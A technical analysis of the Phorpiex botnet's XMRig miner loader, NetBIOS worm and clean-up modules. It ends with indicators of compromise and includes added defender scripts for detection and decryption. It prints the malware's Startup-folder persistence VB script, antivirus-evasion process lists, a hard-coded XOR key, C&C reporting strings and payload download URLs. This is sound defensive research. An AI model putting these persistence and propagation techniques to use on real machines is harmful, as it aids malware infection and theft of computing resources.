2025-04-09 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)05/31 Report--
This article explains the Phorpiex botnet in technical detail, module by module. It is shared here as a reference; after reading it you should have a working understanding of how the loader, the miner and the worm components operate.
XMRig
The main purpose of this module is to start the XMRig Monero miner. Monero (XMR) is a decentralized cryptocurrency: transactions are validated by distributed consensus and recorded on a blockchain. It is attractive to attackers because it is hard to trace; by default Monero obfuscates the sending and receiving addresses and the transaction amounts, so transactions on the Monero blockchain cannot be linked to specific users or real-world identities.
The Monero miner, built from XMRig's open-source code, is one of the payloads Phorpiex uses to make money; the infected computers generate about $15000 in revenue a month. The attacker implants the miner on the infected computer and runs it. The miner itself and its parameters are obfuscated with a simple cipher and embedded in the module; before execution, the malware decrypts the parameters and passes them to the miner.
Phorpiex uses the same XMRig build that is sold online, and the attacker probably bought it there.
Loader process initialization
To prevent multiple instances of XMRig from running, the loader creates a mutex with a hard-coded name. The name differs between samples; the following hard-coded variants were found:
4b293105d7b102179b20
bf73f1604fc0b6b3d70d
Persistence
The loader copies itself to "C:\ProgramData\{HardcodedFolder}\{HardcodedExecutable}". Values of "{HardcodedExecutable}" in different samples:
cfgmgr.exe
windrv32.exe
sysdrv32.exe
The path "C:\ProgramData\{HardcodedFolder}" is also used to store temporary files, such as VB scripts and the configuration passed to the miner. Values of "{HardcodedFolder}" in different samples:
FeSdavbMaL
ADwXcSSGvY
The malware creates a link to its own copy in the startup folder:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\{HardcodedFilename}.url
Values of "{HardcodedFilename}" in different samples:
kBBcUBIbha
LtHgNeMqRB
The following figure shows the links in the startup folder and the path to the executable file:
The loader chooses how to create the startup .url link based on whether any of the following anti-malware processes exist on the system:
a2guard.exe
a2service.exe
a2start.exe
If none of these processes is detected, the loader creates the startup link by executing the following VB script:
' VB script dropped by the loader: writes an Internet-shortcut (.url) file into the user's Startup folder
Set objFSO = CreateObject("Scripting.FileSystemObject")
outFile = "C:\Users\Lab\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kBBcUBIbha.url"
Set objFile = objFSO.CreateTextFile(outFile, True)
' Doubled quotes are VBScript's escaped quote; the line written to disk is URL="file:///C:\ProgramData\FeSdavbMaL\cfgmgr.exe"
objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///C:\ProgramData\FeSdavbMaL\cfgmgr.exe"""
objFile.Close
If the VB script fails to create this startup entry, or any of the processes listed above is detected, the link is created directly from the loader using WinAPI functions. That code path contains an additional check for running anti-malware processes. The script itself is typically executed with the following command:
cmd.exe /C WScript "C:\ProgramData\FeSdavbMaL\r.vbs"
If any of the following processes is found, the loader uses thread injection (see the injection details section) instead of a direct "cmd" call:
bdagent.exe
vsserv.exe
cfp.exe
ccavsrv.exe
cmdagent.exe
avp.exe
avpui.exe
ksde.exe
On x86 the loader searches for explorer.exe. On x64 all processes are enumerated as injection targets, but these two are always skipped:
csrss.exe
winlogon.exe
The following figure summarizes all of the above:
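The persistence mechanism above leaves a recognisable artifact: a .url file in the Startup folder whose URL is a file:/// link to an executable under C:\ProgramData. The following is an added example, not code from the article or from the malware, of a defender-side check that parses such shortcuts and flags that pattern. The sample shortcut text is constructed from the article's VB script; the function names are this example's own.

```python
"""Flag Internet-shortcut (.url) persistence entries in a Windows Startup folder.

Added example, not code from the article: a defender-side check for the startup
technique described above, in which a .url file in the Startup folder launches an
executable dropped under C:\\ProgramData. The sample shortcut text is constructed
from the article's VB script; all function names are this example's own.
"""
import os
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote, urlparse

# Parent directory the article reports the loader copying itself into.
SUSPICIOUS_PARENTS = ("c:\\programdata\\",)
EXECUTABLE_EXTENSIONS = (".exe", ".scr", ".bat", ".cmd", ".vbs", ".js")


def parse_url_shortcut(text: str) -> Dict[str, str]:
    """Parse the [InternetShortcut] section of a .url file into a key/value dict."""
    fields: Dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            # The loader's script writes the URL wrapped in quotes; strip them.
            fields[key.strip().lower()] = value.strip().strip('"')
    return fields


def local_target(url: str) -> Optional[str]:
    """Return the local Windows path for a file:/// URL, or None for any other scheme."""
    parsed = urlparse(url)
    if parsed.scheme.lower() != "file":
        return None
    # "file:///C:\ProgramData\x.exe" parses to path "/C:\ProgramData\x.exe".
    path = unquote(parsed.path).lstrip("/")
    return path.replace("/", "\\")


def classify_url_shortcut(text: str) -> str:
    """'suspicious' when the shortcut launches an executable from ProgramData, else 'benign'."""
    fields = parse_url_shortcut(text)
    target = local_target(fields.get("url", ""))
    if target is None:
        return "benign"
    lowered = target.lower()
    if lowered.startswith(SUSPICIOUS_PARENTS) and lowered.endswith(EXECUTABLE_EXTENSIONS):
        return "suspicious"
    return "benign"


def scan_startup_folder(folder: str) -> List[Tuple[str, str]]:
    """Classify every .url file in a Startup folder; returns (path, verdict) pairs."""
    results: List[Tuple[str, str]] = []
    for name in sorted(os.listdir(folder)):
        if name.lower().endswith(".url"):
            full = os.path.join(folder, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                results.append((full, classify_url_shortcut(fh.read())))
    return results


# Constructed samples: the first matches what the article's VB script writes.
SAMPLE_MALICIOUS = '[InternetShortcut]\r\nURL="file:///C:\\ProgramData\\FeSdavbMaL\\cfgmgr.exe"\r\n'
SAMPLE_BENIGN = "[InternetShortcut]\r\nURL=https://example.com/\r\n"

if __name__ == "__main__":
    for label, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, "->", classify_url_shortcut(sample))
```

On a live host, scan_startup_folder would be pointed at the per-user Startup path from the article (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup); the classifier only looks at where the link points, so it also catches samples that use a different hard-coded folder or executable name.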
Encryption
The loader's configuration values and the XMRig miner payload are XOR-encrypted. The decryption key "0125789244697858" is hard-coded into the binary. After decryption the following values are obtained:
C&C server URL to contact: http://185.176.27[.]132/update.txt
XMR wallet (overwritten with the user ID in this module, but used directly in other Phorpiex modules):
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQujt72bSgzs7j6uNDV
Mining pool: 176.27.132:4545
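The decryption step described above is plain repeating-key XOR, so an analyst can recover the configuration from a dumped blob with a few lines of code. The following is an added example, not the article's or the malware's code. It uses the key reported in the article, but the ciphertext is constructed here by XOR-ing a made-up configuration string, so the routine can be exercised offline without the real samples.

```python
"""Repeating-key XOR decryption of the loader's embedded configuration.

Added example, not the article's code: the article states that the loader
configuration and the XMRig payload are XOR-encrypted with the hard-coded key
"0125789244697858". The ciphertext below is constructed by applying the same XOR
to a made-up configuration string (no real C&C or pool addresses), so the decrypt
routine can be demonstrated offline.
"""
from itertools import cycle
from typing import List

XOR_KEY = b"0125789244697858"  # key reported in the article


def xor_with_key(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """XOR every byte of data with the key, repeating the key as needed.
    XOR is its own inverse, so one call both encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_config_strings(blob: bytes, key: bytes = XOR_KEY, min_len: int = 6) -> List[str]:
    """Decrypt a blob and return printable ASCII runs of at least min_len characters.
    This is how an analyst pulls URLs, pool addresses and wallet IDs out of the
    decrypted configuration without knowing its exact layout."""
    plain = xor_with_key(blob, key)
    runs: List[str] = []
    current = bytearray()
    for b in plain:
        if 0x20 <= b < 0x7F:
            current.append(b)
        else:
            if len(current) >= min_len:
                runs.append(current.decode("ascii"))
            current = bytearray()
    if len(current) >= min_len:
        runs.append(current.decode("ascii"))
    return runs


# Constructed plaintext standing in for the decrypted loader configuration (not real IoCs).
SAMPLE_PLAINTEXT = b"http://cnc.example.invalid/update.txt\x00pool.example.invalid:4545\x00"
SAMPLE_CIPHERTEXT = xor_with_key(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print("ciphertext:", SAMPLE_CIPHERTEXT.hex())
    print("recovered :", recover_config_strings(SAMPLE_CIPHERTEXT))
```

Because the key is only 16 bytes and repeats, a blob that decrypts to readable strings with this key is itself a strong indicator that the binary belongs to this loader family; the same function applied to the embedded miner payload should yield an MZ header at offset zero.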
Loader
The miner executable is decrypted using a hard-coded XOR key:
The loader injects the decrypted miner into the address space of a newly created process from the "C:\Windows\System32" directory (wuapp.exe in the sample). During execution, the loader polls for taskmgr.exe. If Task Manager is detected, the loader terminates the miner and suspends its loop until Task Manager is no longer running; once taskmgr.exe is gone, the miner is started again.
The following figure shows what it looks like:
Injection details
The most notable aspect of the injection process is the way API functions are called. The loader maps its own copy of ntdll.dll, searches it for the required functions, stores pointers to them in an internal array, and then calls through that array. The address of ntdll.dll is obtained via the PEB:
The ntdll.dll base address is held in ESI:
ESI 777A000 ntdll.777A000
Miner configuration
The loader saves the configuration to "C:\ProgramData\{HardcodedFolder}\cfg" and passes it to the miner as a command-line argument. The configuration has the following structure:
{
  "algo": "cryptonight",
  "autosave": false,
  "background": false,
  "colors": true,
  "retries": 5,
  "retry-pause": 5,
  "syslog": false,
  "print-time": 60,
  "av": 0,
  "safe": false,
  "cpu-priority": null,
  "cpu-affinity": null,
  "donate-level": 0,
  "threads": 1,
  "pools": [{"url": "185.176.27.132 url", "user": "ea7c252d-5590-4983-995d-02a1a35bb966", "pass": "x", "keepalive": false, "nicehash": false, "variant": "r", "tls": false, "tls-fingerprint": null}],
  "api": {"port": 0, "access-token": null, "worker-id": null}
}
In the sample studied, all configuration values are hard-coded, and the "threads" value equals the number of processors in the system.
Unused data
An XMR wallet was found in memory during execution of the loader. Different samples may contain different wallets:
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQujt72bSgzs7j6uNDV
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoMMyaX2Eun2XCgFYq
Analysing how this module uses the XMR wallet, and checking where the wallet address should be written, shows that it is overwritten with the user ID before the configuration is built:
Network Communications
The XMRig loader checks the C&C server for new instructions and executes any it finds. This communication happens twice, over unencrypted HTTP, before and after the miner injection. The values of the corresponding fields:
Supported commands
The following is the format of the command file sent by the C&C server (the original comments are retained):
[Miner]
address=YOUR_XMR_ADDRES ; XMR address, email (minergate), btc address (nicehash), etc.
poolport=pool.minexmr.com:4444 ; Do not include 'stratum+tcp://' e.g monerohash.com:3333
password=x ; Pool password
stop=0 ; Change this value to "1" to stop miner. If not specified or equal to "0" miner will work.
proxy=0 ; Change this value to "1" if you are mining to xmrig-proxy instead of pool. This enables using a unqiue address per worker for better miner monitoring.
keepalive=0 ; 0 to disable keepalive, 1 to enable keepalive
[Update]
;config_url=http://xmrminer.net/config.txt ; You can update the url that points to the configuration file. Must begin with "http://" or "https://"
knock_time=30 ; Number of minutes the miner waits between visits to config file. If never specified, default is 30 minutes.
;update_url=http://mysite.com/new_miner ; url of new miner. Miner will get updated with this file.
;update_hash=xxxxxxxxxx ; md5 hash of new miner file. 32 characters long (16 byte hexadecimal format for hash). You need to specify this value, othewise miner will not get updated of configuration.
;End ; Do not remove this line, ";End" string specifies end of configuration file.
;Everything after a ";" character is a comment, so it is ignored by the miner when parsing the configuration. Only the ";" character is used for this purpose.
;Always include the appropriate options below the defined "[Miner]" and "[Update]" sections. If you do not include the section names it won't work.
;Make sure everything is spelled correctly
;If you specify "config_url" double check it is correctly spelled, otherwise the miner that reads an incorrect url will never go back to a correct url (i.e. Last configuration will be locked).
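The command file above is a small INI dialect: "[Miner]" and "[Update]" sections, "key=value" lines, everything after ";" treated as a comment, and a ";End" line that terminates the file. Being able to parse it is useful when triaging C&C responses captured from the unencrypted HTTP traffic the article describes. The following is an added example, not the loader's own parser; it implements the rules exactly as the article's template states them, and the sample text is constructed from that template with placeholder values.

```python
"""Parser for the XMRig loader's INI-style command file described above.

Added example, not the article's or the malware's code. It models the format as
the article documents it: "[Miner]" and "[Update]" sections, "key=value" lines,
everything after ";" a comment, and ";End" as the terminator. The sample text is
constructed from the article's template with placeholder values; the function
names are this example's own.
"""
import re
from typing import Dict, Optional

# The article says an update only happens when a 32-character md5 is supplied.
MD5_HEX = re.compile(r"^[0-9a-fA-F]{32}$")


def parse_command_file(text: str) -> Dict[str, Dict[str, str]]:
    """Return {section: {key: value}} for the command file, stopping at ';End'."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        stripped = raw.strip()
        if stripped.lower().startswith(";end"):
            break                                   # terminator: nothing after it is parsed
        line = stripped.split(";", 1)[0].strip()    # drop the comment part
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue                                # options outside a section are ignored
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def interpret(sections: Dict[str, Dict[str, str]]) -> dict:
    """Derive the actions the article lists: mining target, stop flag, update request."""
    miner = sections.get("miner", {})
    update = sections.get("update", {})
    update_url = update.get("update_url")
    update_hash = update.get("update_hash", "")
    return {
        "pool": miner.get("poolport"),
        "wallet": miner.get("address"),
        "stop": miner.get("stop", "0") == "1",
        "proxy": miner.get("proxy", "0") == "1",
        "knock_minutes": int(update.get("knock_time", "30")),   # default stated in the template
        "update": update_url if update_url and MD5_HEX.match(update_hash) else None,
        "config_url": update.get("config_url"),
    }


# Constructed sample: the article's template with placeholder (non-real) values.
SAMPLE = """[Miner]
address=YOUR_XMR_ADDRES ; XMR address, email (minergate), btc address (nicehash), etc.
poolport=pool.example.invalid:4444 ; Do not include 'stratum+tcp://'
password=x ; Pool password
stop=1 ; Change this value to "1" to stop miner.
proxy=0
keepalive=0
[Update]
knock_time=15 ; minutes between visits to config file
update_url=http://update.example.invalid/new_miner ; url of new miner (placeholder)
update_hash=0123456789abcdef0123456789abcdef ; md5 of new miner (placeholder value)
;End ; Do not remove this line
address=SHOULD_BE_IGNORED ; after ;End, never parsed
"""

if __name__ == "__main__":
    print(interpret(parse_command_file(SAMPLE)))
```

The parser deliberately treats a commented-out ";update_url=" line as absent and refuses an update whose hash is not 32 hex characters, which mirrors the two conditions the template's own comments impose; a captured response that asks for an update with a valid hash is the "Miner update" case shown in the figures that follow.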
Miner update
Miner stop
The server may request a different file name:
c.txt
upd.txt
newup.txt
update.txt
xmrupdate.txt
Phorpiex NetBIOS Worm module
This module is a self-propagating worm that can also download other payloads. The NetBIOS worm scans random IP addresses for an open TCP port 139 (NetBIOS) and uses a hard-coded list of usernames and passwords for brute-force attacks. The IP addresses to scan are generated with the rand function, seeded with the result of GetTickCount. Generated addresses whose first octet is 127, 172 or 192 are filtered out. The NetBIOS worm creates mutexes with hard-coded names to prevent multiple execution. A separate thread is created to communicate with each IP address, and the scanning function is very similar to the one in the Phorpiex VNC worm module.
If it is loaded by Phorpiex Tldr, the module is saved under a pseudorandom name. During the self-propagation phase the malware copies itself as "WindowsDefender.exe". In that case the NetBIOS worm must download the Phorpiex main module or another payload. The malware obtains its own file name by calling GetModuleFileName; if the name is "WindowsDefender.exe", it attempts to download and execute a file from a hard-coded URL:
URLs in different samples:
hxxp://92.63.197.153/NB.exe
hxxp://92.63.197.153/nb.exe
hxxp://193.32.161.77/CRAZYBLAYNE.exe
hxxp://92.63.197.153/enum.exe
hxxp://193.32.161.77/enum.exe
hxxp://193.32.161.77/aldenta.exe
Finally, the network scan runs in an infinite loop. For each randomly generated IP address, the NetBIOS module starts a thread that checks whether TCP port 139 is listening. After a successful connection, the NetBIOS worm attempts to enumerate network shares by calling the NetShareEnum API function.
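From the network, the scanning loop described in this section (random public IP addresses, one connection attempt to TCP port 139 each, many per second) is very different from legitimate SMB traffic, which goes repeatedly to a handful of servers. The following is an added example, not from the article, of a detection heuristic that reads firewall-style connection records and flags a source that reaches many distinct, widely spread public hosts on port 139 within a short window. The log format, the records and the thresholds are constructed assumptions for this example.

```python
"""Heuristic detection of a NetBIOS (TCP/139) sweep like the worm's scanning loop.

Added example, not from the article. It reads firewall-style connection records and
flags an internal host that opens TCP/139 connections to many distinct, widely
spread public addresses within a short window, which is what the random-IP scan
described above looks like on the wire. The log format, the records and the
thresholds are constructed assumptions for this example.
"""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed log format: ISO timestamp, source, destination, destination port.
LOG_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")


def parse_line(line: str) -> Optional[dict]:
    """Parse one connection record; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
            "dst": m["dst"], "dport": int(m["dport"])}


def is_public(ip: str) -> bool:
    """True for routable addresses; SMB traffic to private ranges is ignored here."""
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local
                or a.is_multicast or a.is_reserved or a.is_unspecified)


def find_netbios_sweeps(lines: List[str], window: timedelta = timedelta(seconds=60),
                        min_targets: int = 20, min_first_octets: int = 5) -> Dict[str, int]:
    """Return {source: max distinct TCP/139 targets in any window} for sources that reach
    at least min_targets distinct public hosts spread over min_first_octets /8 blocks.
    A host that talks to a few file servers never satisfies both conditions."""
    per_src: Dict[str, List[tuple]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["dport"] == 139 and is_public(rec["dst"]):
            per_src[rec["src"]].append((rec["ts"], rec["dst"]))
    alerts: Dict[str, int] = {}
    for src, events in per_src.items():
        events.sort()
        start, best = 0, 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:   # slide the window forward
                start += 1
            targets = {dst for _, dst in events[start:end + 1]}
            first_octets = {dst.split(".")[0] for dst in targets}
            if len(targets) >= min_targets and len(first_octets) >= min_first_octets:
                best = max(best, len(targets))
        if best:
            alerts[src] = best
    return alerts


def constructed_log() -> List[str]:
    """Sample records: 10.0.0.5 sweeps 25 spread-out public hosts in 25 seconds,
    10.0.0.7 repeatedly reaches one external partner server (a benign pattern)."""
    base = datetime(2019, 3, 1, 10, 0, 0)
    lines = []
    for i in range(25):
        dst = f"{5 + 3 * i}.{(37 * i) % 256}.{(91 * i) % 256}.{(13 * i) % 250 + 1}"
        lines.append(f"{(base + timedelta(seconds=i)).isoformat()} src=10.0.0.5 dst={dst} dport=139")
    for i in range(25):
        lines.append(f"{(base + timedelta(seconds=i)).isoformat()} src=10.0.0.7 dst=93.184.216.34 dport=139")
    lines.append(f"{base.isoformat()} src=10.0.0.5 dst=10.0.1.20 dport=445")   # internal, ignored
    return lines


SAMPLE_LOG = constructed_log()

if __name__ == "__main__":
    print(find_netbios_sweeps(SAMPLE_LOG))
```

The first-octet spread is what separates the worm's rand-based target selection from a backup job or a misconfigured client hammering one server; the article's own filter (no addresses starting with 127, 172 or 192) cannot be used as a signature, since a defender sees only the addresses that were contacted.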
The Phorpiex NetBIOS worm attempts to connect to a network share using a hard-coded list of usernames and passwords:
After successfully connecting to a network share, the malware attempts to copy itself to the following locations:
WindowsDefender.exe
WINDOWS\All Users\StartMenu\Programs\Startup\WindowsDefender.exe
WINDOWS\StartMenu\Programs\Startup\WindowsDefender.exe
WINNT\Profiles\All Users\StartMenu\Programs\Startup\WindowsDefender.exe
ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\WindowsDefender.exe
Users\All Users\Microsoft\Windows\Start Menu\Programs\WindowsDefender.exe
Documents and Settings\All Users\StartMenu\Programs\Startup\WindowsDefender.exe
The target paths point to startup folders to ensure persistence on the target system. The last step is to launch the uploaded file on the target host, which can be done in two ways:
Create a new service on the remote host. The malware names the service "NetBIOS Windows Defender", sets its type to SERVICE_WIN32_SHARE_PROCESS, and uses SERVICE_AUTO_START as the start type.
Schedule a task on the remote host. The scheduled time is the current time plus 120 seconds. The malware obtains the remote host's time through the NetRemoteTOD API function and corrects it for the time zone.
After a successful operation, the worm reports to the C&C server with a simple HTTP request:
_snwprintf(url, L"hxxp://92.63.197.153/e.php?srv=%ls|%ls", NetLocation, UserName, Password, Message)
User agent of the HTTP request:
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
The malware can send the following message:
Information in other samples:
URLs found in various samples:
hxxp://193.32.161.77/nb.php?srv=
hxxp://193.32.161.77/exec.php?srv=
hxxp://193.32.161.77/nn.php?srv=
hxxp://193.32.161.77/gud.php?srv=
hxxp://193.32.161.77/go.php?srv=
hxxp://193.32.161.77/netb.php?srv=
hxxp://193.32.161.77/ok.php?srv=
hxxp://92.63.197.153/e.php?srv=
hxxp://92.63.197.153/huh.php?srv=
hxxp://92.63.197.153/nb.php?srv=
hxxp://92.63.197.153/tst.php?srv=
hxxp://92.63.197.153/ya.php?nb=
Auxiliary module
Phorpiex is highly modular. The main module receives a queue of commands, each of which is a separate executable module. Many variants of micro-modules with very limited functionality have also been observed. One such small executable loaded by Phorpiex is the clean-up module. It contains two functions: one terminates processes with specified hard-coded names, the other deletes several registry entries.
The list of processes terminated by the cleanup module includes:
winsrvc32.exe
winupsvcmgr.exe
winsvcinstl.exe
winupd32svc.exe
wincfg32svc.exe
windrv.exe
wincfgrmg***.exe
winmgr.exe
wincfg.exe
wincfg32.exe
winupd.exe
winupd32.exe
winsvcin32.exe
winupd32cfg.exe
winmg***cfg.exe
csrssc.exe
csrsscxn.exe
winsecmgr.exe
winsecmgrv.exe
windrvmg***.exe
The cleanup module also removes the following values from the registry key "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\":
WinCfgMgr
Windows Update Service Manager
Microsoft Windows Update Services
Microsoft Update 495036
Microsoft Windows Service Installer
Microsoft Windows Driver Configuration
Microsoft Windows Installer Svc
Windows Security Manager
This module disables obsolete Phorpiex modules, such as Phorpiex Trik:
Another type of small executable is the geolocation module. It uses the service api.wipmania.com to determine the location of the infected computer. If the country is on the whitelist, the malware downloads a payload from a hard-coded URL:
In early 2019, loaders for China and Vietnam were discovered that installed different variants of the GandCrab ransomware on infected computers based on this location information.
Summary
Phorpiex is a very distinctive malware family: its functionality is split across many different modules, each with its own task, such as sending spam or worm-style infection. If new features are needed, new modules are introduced without rebuilding or reconfiguring the existing ones. This approach is less error-prone, takes less time, and saves the malware developers a lot of effort.
To date, Phorpiex has infected more than 1 million computers and generated considerable profit. What we can see and estimate is only the tip of the iceberg. Raccoon Stealer and Predator the Thief, also part of the Phorpiex family, have their own distinctive ways of carrying out malicious activity.
IOC
XMRig Silent Loader
Mutex names
0fe420b0eb8396a48280
3f3ff4de39fc87f8152a
4b293105d7b102179b20
5d6eb4d965fd09330511
a6c92143cac02de51d4a
bf73f1604fc0b6b3d70d
ff9702c705fd434610c0
Strings
0125789244697858
f23e1993dfdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///"
Phorpiex NetBIOS Worm Module
URLs
hxxp://92.63.197.153/NB.exe
hxxp://92.63.197.153/nb.exe
hxxp://193.32.161.77/CRAZYBLAYNE.exe
hxxp://92.63.197.153/enum.exe
hxxp://193.32.161.77/enum.exe
hxxp://193.32.161.77/aldenta.exe
Auxiliary modules